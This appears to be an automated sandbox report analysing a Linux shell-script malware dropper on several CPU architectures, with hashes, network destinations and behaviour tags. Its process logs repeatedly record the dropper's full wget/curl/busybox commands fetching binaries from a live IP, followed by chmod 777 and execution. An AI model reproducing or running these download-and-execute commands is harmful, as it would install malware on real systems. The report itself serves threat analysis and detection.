Malware Analysis Report

2024-11-13 17:45

Sample ID 241110-bc4gksynfk
Target 0aab00d4e7063c05a4a2623bcf37a039.bin
SHA256 95952567b571cd2e6817a255a63f29c9096c91d7c044d23504c02770f893c4ac
Tags
defense_evasion antivm discovery
score
7/10

Analysis Overview

score
7/10

SHA256

95952567b571cd2e6817a255a63f29c9096c91d7c044d23504c02770f893c4ac

Threat Level: Shows suspicious behavior

The file 0aab00d4e7063c05a4a2623bcf37a039.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 01:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

22s

Max time network

131s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Writes file to tmp directory

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

debian9-armhf-20240418-en

Max time kernel

21s

Max time network

22s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/798-1-0xb6758000-0xb6769044-memory.dmp

memory/822-2-0xb6778000-0xb6789044-memory.dmp

memory/848-3-0xb6705000-0xb6716044-memory.dmp

memory/849-4-0xb672d000-0xb673e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

debian9-mipsbe-20240611-en

Max time kernel

63s

Max time network

64s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
